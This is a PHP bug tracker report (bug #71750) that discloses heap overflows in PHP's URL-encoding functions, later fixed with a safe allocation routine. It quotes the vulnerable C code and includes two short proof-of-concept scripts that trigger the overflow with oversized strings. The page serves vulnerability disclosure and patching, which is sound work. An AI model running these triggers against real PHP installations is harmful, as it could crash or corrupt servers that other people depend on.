php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #71750 Multiple Heap Overflows in php_raw_url_encode/php_url_encode
Submitted: 2016-03-09 05:27 UTC Modified: 2016-03-21 06:10 UTC
From: taoguangchen at icloud dot com Assigned:
Status: Closed Package: *General Issues
PHP Version: 7.0.4 OS:
Private report: No CVE-ID:
 [2016-03-09 05:27 UTC] taoguangchen at icloud dot com
Description:
------------
Vulnerable code:
```
PHPAPI zend_string *php_raw_url_encode(char const *s, size_t len)
{
	...
	str = zend_string_alloc(3 * len, 0);
	for (x = 0, y = 0; len--; x++, y++) {
		ZSTR_VAL(str)[y] = (unsigned char) s[x];
...
PHPAPI zend_string *php_url_encode(char const *s, size_t len)
{
  ...
	start = zend_string_alloc(3 * len, 0);
```

PoC:
```
<?php
//php_raw_url_encode
ini_set('memory_limit', -1);
rawurlencode(str_repeat('A', 0xffffffff/3));
```

```
<?php
//php_url_encode
ini_set('memory_limit', -1);
setcookie('hi', str_repeat('A', 0xffffffff/3));
```

Fix:
uses zend_string_safe_alloc instead


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-03-21 05:38 UTC] stas@php.net
This also does not look like security issue, requires specially crafted code.
 [2016-03-21 06:10 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-03-21 06:11 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c4517b2a5e3141393c1c4f6fca51e1c325e91251
Log: Fix bug #71750: use zend_string_safe_alloc for calculated allocations
 [2016-03-21 06:11 UTC] stas@php.net
-Status: Open +Status: Closed
 [2016-07-20 11:32 UTC] davey@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c4517b2a5e3141393c1c4f6fca51e1c325e91251
Log: Fix bug #71750: use zend_string_safe_alloc for calculated allocations
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Jul 25 22:01:35 2017 UTC